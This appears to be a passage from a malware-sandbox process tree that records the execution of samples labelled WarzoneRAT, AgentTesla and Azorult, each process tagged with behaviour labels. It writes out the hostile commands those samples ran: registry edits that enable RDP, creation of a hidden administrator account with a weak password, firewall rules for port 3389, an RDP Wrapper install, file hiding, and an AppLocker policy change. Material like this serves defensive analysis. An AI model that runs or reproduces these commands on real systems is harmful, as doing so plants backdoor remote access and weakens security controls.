C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESABA4.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc4422C4E6DC664178A147312DAB08CEF.TMP"7⤵PID:5708
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\q5ecrx4q.cmdline"6⤵PID:5400
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESAC40.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc994F3956B6C245F28A89AF84C19CD125.TMP"7⤵
- System Location Discovery: System Language Discovery
PID:5616
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\pzxkh9qh.cmdline"6⤵
- System Location Discovery: System Language Discovery
PID:5372 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESACAE.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc9BD7B1684A4C472BAF31EB7ED0353097.TMP"7⤵
- System Location Discovery: System Language Discovery
PID:5444
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\dlgrnvxm.cmdline"6⤵PID:964
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESAD88.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc66E1BF799E14FBC867E174EBFDA155.TMP"7⤵PID:1240
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\ahhpmibz.cmdline"6⤵PID:2208
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESAE82.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc4511A507F40246E7BCEC35BBB8A824C9.TMP"7⤵PID:6068
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\wni0eu2d.cmdline"6⤵PID:4564
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESAF1F.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc130BB9AFFD1A42BEA564A81C209E3081.TMP"7⤵PID:5972
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\1wys_npk.cmdline"6⤵PID:3820
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESAFBB.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc2AD95FD171EA44DEB23CEFDA677F1AB4.TMP"7⤵PID:1704
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\c-pxhf0i.cmdline"6⤵PID:2492
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB038.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc272530A3AD654AEAACB01E9448355039.TMP"7⤵
- System Location Discovery: System Language Discovery
PID:2496
-
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\piyhyrni.cmdline"6⤵PID:3432
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2F22.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcB62D42C246034B9589DA5EED90B1150.TMP"7⤵PID:5148
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7080 /prefetch:12⤵PID:5260
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5988 /prefetch:82⤵PID:5332
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6448 /prefetch:82⤵
- Subvert Trust Controls: Mark-of-the-Web Bypass
- NTFS ADS
PID:5992
-
-
C:\Users\Admin\Downloads\WarzoneRAT.exe"C:\Users\Admin\Downloads\WarzoneRAT.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- NTFS ADS
PID:5688 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jFvfxe" /XML "C:\Users\Admin\AppData\Local\Temp\tmpE8C1.tmp"3⤵
- Scheduled Task/Job: Scheduled Task
PID:1916
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"3⤵PID:2468
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=7296 /prefetch:82⤵PID:5544
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3048 /prefetch:12⤵PID:4100
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=58 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6440 /prefetch:12⤵PID:3804
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=59 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5504 /prefetch:12⤵PID:3352
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6720 /prefetch:12⤵PID:4708
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=62 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7176 /prefetch:12⤵PID:5460
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=8048 /prefetch:82⤵PID:3708
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7868 /prefetch:82⤵
- Subvert Trust Controls: Mark-of-the-Web Bypass
- NTFS ADS
PID:5952
-
-
C:\Users\Admin\Downloads\AgentTesla.exe"C:\Users\Admin\Downloads\AgentTesla.exe"2⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
PID:916
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=66 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7720 /prefetch:12⤵PID:3620
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=7732 /prefetch:82⤵PID:4308
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6416 /prefetch:82⤵
- Subvert Trust Controls: Mark-of-the-Web Bypass
- NTFS ADS
PID:2348
-
-
C:\Users\Admin\Downloads\butterflyondesktop.exe"C:\Users\Admin\Downloads\butterflyondesktop.exe"2⤵
- Executes dropped EXE
PID:6084 -
C:\Users\Admin\AppData\Local\Temp\is-AL23C.tmp\butterflyondesktop.tmp"C:\Users\Admin\AppData\Local\Temp\is-AL23C.tmp\butterflyondesktop.tmp" /SL5="$290280,2719719,54272,C:\Users\Admin\Downloads\butterflyondesktop.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
PID:4500 -
C:\Program Files (x86)\Butterfly on Desktop\ButterflyOnDesktop.exe"C:\Program Files (x86)\Butterfly on Desktop\ButterflyOnDesktop.exe"4⤵
- Executes dropped EXE
- Suspicious use of SendNotifyMessage
PID:4716
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://freedesktopsoft.com/butterflyondesktoplike.html4⤵PID:5476
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffa16b83cb8,0x7ffa16b83cc8,0x7ffa16b83cd85⤵PID:1308
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=69 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6760 /prefetch:12⤵PID:3352
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=70 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6328 /prefetch:12⤵PID:1488
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=71 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7128 /prefetch:12⤵PID:5192
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=72 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8156 /prefetch:12⤵PID:5936
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=73 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6284 /prefetch:12⤵PID:5556
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=75 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5920 /prefetch:12⤵PID:2108
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6840 /prefetch:82⤵PID:5416
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1940,17433169104008851766,671379357677263358,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1852 /prefetch:82⤵
- Subvert Trust Controls: Mark-of-the-Web Bypass
- NTFS ADS
PID:1472
-
-
C:\Users\Admin\Downloads\Azorult.exe"C:\Users\Admin\Downloads\Azorult.exe"2⤵
- Modifies Windows Defender Real-time Protection settings
- UAC bypass
- Blocks application from running via registry modification
- Drops file in Drivers directory
- Executes dropped EXE
- Checks whether UAC is enabled
- Modifies WinLogon
- Hide Artifacts: Hidden Users
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
- System policy modification
PID:3696 -
C:\ProgramData\Microsoft\Intel\wini.exeC:\ProgramData\Microsoft\Intel\wini.exe -pnaxui3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4024 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\install.vbs"4⤵PID:5276
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Programdata\Windows\install.bat" "5⤵
- System Location Discovery: System Language Discovery
PID:4308 -
C:\Windows\SysWOW64\regedit.exeregedit /s "reg1.reg"6⤵
- UAC bypass
- Windows security bypass
- Hide Artifacts: Hidden Users
- Runs .reg file with regedit
PID:576
-
-
C:\Windows\SysWOW64\regedit.exeregedit /s "reg2.reg"6⤵
- Runs .reg file with regedit
PID:3912
-
-
C:\Windows\SysWOW64\timeout.exetimeout 26⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:5196
-
-
C:\ProgramData\Windows\rutserv.exerutserv.exe /silentinstall6⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2364
-
-
C:\ProgramData\Windows\rutserv.exerutserv.exe /firewall6⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3144
-
-
C:\ProgramData\Windows\rutserv.exerutserv.exe /start6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:5816
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\Programdata\Windows\*.*6⤵
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:2880
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\Programdata\Windows6⤵
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:5992
-
-
C:\Windows\SysWOW64\sc.exesc failure RManService reset= 0 actions= restart/1000/restart/1000/restart/10006⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2588
-
-
C:\Windows\SysWOW64\sc.exesc config RManService obj= LocalSystem type= interact type= own6⤵
- Launches sc.exe
PID:5544
-
-
C:\Windows\SysWOW64\sc.exesc config RManService DisplayName= "Microsoft Framework"6⤵
- Launches sc.exe
PID:5772
-
-
C:\ProgramData\Windows\winit.exe"C:\ProgramData\Windows\winit.exe"4⤵
- Executes dropped EXE
- Checks processor information in registry
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:2420 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Programdata\Install\del.bat5⤵PID:1276
-
C:\Windows\SysWOW64\timeout.exetimeout 56⤵
- Delays execution with timeout.exe
PID:4360
-
-
C:\programdata\install\cheat.exeC:\programdata\install\cheat.exe -pnaxui3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:5872 -
C:\ProgramData\Microsoft\Intel\taskhost.exe"C:\ProgramData\Microsoft\Intel\taskhost.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2248 -
C:\programdata\microsoft\intel\P.exeC:\programdata\microsoft\intel\P.exe5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:6036
-
-
C:\programdata\microsoft\intel\R8.exeC:\programdata\microsoft\intel\R8.exe5⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:5868 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\rdp\run.vbs"6⤵PID:2800
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\rdp\pause.bat" "7⤵
- Modifies registry class
PID:488 -
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Rar.exe8⤵
- Kills process with taskkill
PID:3588
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Rar.exe8⤵
- Kills process with taskkill
PID:496
-
-
C:\Windows\SysWOW64\timeout.exe
timeout 3
8⤵
- Delays execution with timeout.exe
PID:5720
-
-
C:\Windows\SysWOW64\chcp.com
chcp 1251
8⤵
PID:772
-
-
C:\rdp\Rar.exe
"Rar.exe" e -p555 db.rar
8⤵
- Executes dropped EXE
PID:800
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Rar.exe8⤵
- Kills process with taskkill
PID:1436
-
-
C:\Windows\SysWOW64\timeout.exe
timeout 2
8⤵
- Delays execution with timeout.exe
PID:5836
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\rdp\install.vbs"8⤵PID:1316
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\rdp\bat.bat" "9⤵PID:5212
-
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f
10⤵
PID:3428
-
-
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fAllowToGetHelp" /t REG_DWORD /d 1 /f
10⤵
PID:5832
-
-
C:\Windows\SysWOW64\netsh.exenetsh.exe advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow10⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:5712
-
-
C:\Windows\SysWOW64\net.exenet.exe user "john" "12345" /add10⤵PID:6120
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user "john" "12345" /add11⤵PID:2024
-
-
-
C:\Windows\SysWOW64\chcp.com
chcp 1251
10⤵
PID:6040
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Администраторы" "John" /add10⤵PID:6052
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Администраторы" "John" /add11⤵PID:5052
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Administratorzy" "John" /add10⤵PID:4472
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Administratorzy" "John" /add11⤵PID:4252
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Administrators" John /add10⤵PID:5236
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Administrators" John /add11⤵
- System Location Discovery: System Language Discovery
PID:3056
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Administradores" John /add10⤵
- System Location Discovery: System Language Discovery
PID:5880 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Administradores" John /add11⤵PID:1580
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Пользователи удаленного рабочего стола" John /add10⤵PID:3316
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add11⤵PID:4044
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Пользователи удаленного управления" John /add10⤵
- System Location Discovery: System Language Discovery
PID:5976 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Пользователи удаленного управления" John /add11⤵
- System Location Discovery: System Language Discovery
PID:5780
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Remote Desktop Users" John /add10⤵
- Remote Service Session Hijacking: RDP Hijacking
- System Location Discovery: System Language Discovery
PID:5344 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Remote Desktop Users" John /add11⤵
- Remote Service Session Hijacking: RDP Hijacking
- System Location Discovery: System Language Discovery
PID:5256
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Usuarios de escritorio remoto" John /add10⤵PID:5208
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Usuarios de escritorio remoto" John /add11⤵PID:2692
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Uzytkownicy pulpitu zdalnego" John /add10⤵PID:4840
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Uzytkownicy pulpitu zdalnego" John /add11⤵PID:6012
-
-
-
C:\rdp\RDPWInst.exe"RDPWInst.exe" -i -o10⤵
- Server Software Component: Terminal Services DLL
- Executes dropped EXE
- Modifies WinLogon
- Drops file in System32 directory
- Drops file in Program Files directory
PID:5248 -
C:\Windows\SYSTEM32\netsh.exenetsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow11⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:1960
-
-
-
C:\rdp\RDPWInst.exe"RDPWInst.exe" -w10⤵
- Executes dropped EXE
PID:224
-
-
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "john" /t REG_DWORD /d 0 /f
10⤵
- Hide Artifacts: Hidden Users
PID:5164
-
-
C:\Windows\SysWOW64\net.exenet accounts /maxpwage:unlimited10⤵PID:3588
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 accounts /maxpwage:unlimited11⤵PID:5148
-
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h "C:\Program Files\RDP Wrapper\*.*"10⤵
- Sets file to hidden
- Drops file in Program Files directory
- Views/modifies file attributes
PID:5736
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h "C:\Program Files\RDP Wrapper"10⤵
- Sets file to hidden
- Drops file in Program Files directory
- Views/modifies file attributes
PID:5384
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h "C:\rdp"10⤵
- Sets file to hidden
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:2356
-
-
-
-
C:\Windows\SysWOW64\timeout.exe
timeout 2
8⤵
- Delays execution with timeout.exe
PID:5940
-
-
-
-
-
C:\ProgramData\Microsoft\Intel\winlog.exe
C:\ProgramData\Microsoft\Intel\winlog.exe -p123
5⤵
- Executes dropped EXE
PID:4672 -
C:\ProgramData\Microsoft\Intel\winlogon.exe"C:\ProgramData\Microsoft\Intel\winlogon.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:6004 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\CE46.tmp\CE47.bat C:\ProgramData\Microsoft\Intel\winlogon.exe"7⤵PID:2260
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell.exe -command "Import-Module applocker" ; "Set-AppLockerPolicy -XMLPolicy C:\ProgramData\microsoft\Temp\5.xml"8⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
PID:1092
-
-
-
-
-
C:\Programdata\RealtekHD\taskhostw.exeC:\Programdata\RealtekHD\taskhostw.exe5⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- NTFS ADS
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:428 -
C:\Programdata\WindowsTask\winlogon.exeC:\Programdata\WindowsTask\winlogon.exe6⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:808 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /C schtasks /query /fo list7⤵PID:5432
-
C:\Windows\SysWOW64\schtasks.exeschtasks /query /fo list8⤵PID:4196
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /C schtasks /Delete /TN "svchost" /F7⤵
- Indicator Removal: Clear Persistence
PID:1596 -
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
8⤵
PID:5720
-
-
